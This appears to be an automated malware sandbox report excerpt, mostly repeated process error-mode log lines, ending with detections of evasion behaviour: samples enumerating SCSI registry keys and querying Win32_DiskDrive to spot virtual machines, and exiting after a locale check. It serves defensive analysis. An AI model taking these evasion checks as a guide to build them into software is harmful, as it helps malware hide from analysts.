Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5g0.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u5g0.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_1-89106

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
